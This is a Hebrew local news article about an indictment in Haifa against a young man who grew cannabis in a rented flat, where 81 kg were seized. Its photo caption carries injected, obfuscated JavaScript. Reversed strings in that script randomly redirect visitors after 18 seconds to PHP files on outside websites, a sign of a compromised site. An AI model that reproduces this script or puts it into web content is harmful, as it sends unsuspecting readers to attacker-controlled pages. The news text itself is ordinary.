fbpx
[shortcode-weather-atlas city_selector=1178243 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

81 ק"ג של קנאביס בדירת מגורים

פרקליטות מחוז חיפה הגישה כתב אישום נגד צעיר שגידל בביתו עשרות שתילי קנאביס. בית המשפט מתבקש לקבוע כי הוא סוחר סמים
צילום: shutterstock
קנאביס | צילום: shutters$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

לבית המשפט המחוזי בחיפה הוגש כתב אישום נגד צעיר בן 24 שגידל בביתו עשרות שתילי קנאביס. ברשותו נתפסו לא פחות מ-81 ק"ג של סמים בעת שנעצר על ידי המשטרה.

על פי כתב האישום שהוגש נגדו, הצעיר שכר דירה וצייד אותה באדניות, מפוחים, מאווררים, שנאים וציוד דישון. למעשה, הוא  בנה מעבדה לגידול קנאביס בשיטת ההידרו.

בתחילת החודש פרצו השוטרים לדירתו של הצעיר ותפסו 98 שתילים של קנאביס. על פי כתב האישום, בידי המשטרה מתועדים לפחות 10 מקרים שבהם מכר הצעיר קנאביס לאחרים.

עו"ד תומר נווה. צילום: יח"צ
עו"ד תומר נווה. צילום: יח"צ

הצעיר שנמצא במעצר, מיוצג על ידי עו"ד תומר נווה, מואשם בשורה של סעיפים בהם ייצור הכנה והפקה של סמים מסוכנים, החזקת סם מסוכן שלא לצריכה עצמית וכן בייבוא ייצוא וסחר והספקה. פרקליטות מחוז חיפה מבקשת מבית המשפט לקבוע כי הנאשם הינו "סוחר סמים" ולחלט את הרכוש שנתפס.

אהבתם? שתפו!

תגיות

אולי גם יעניין אותך

שיתוף ברשתות החברתיות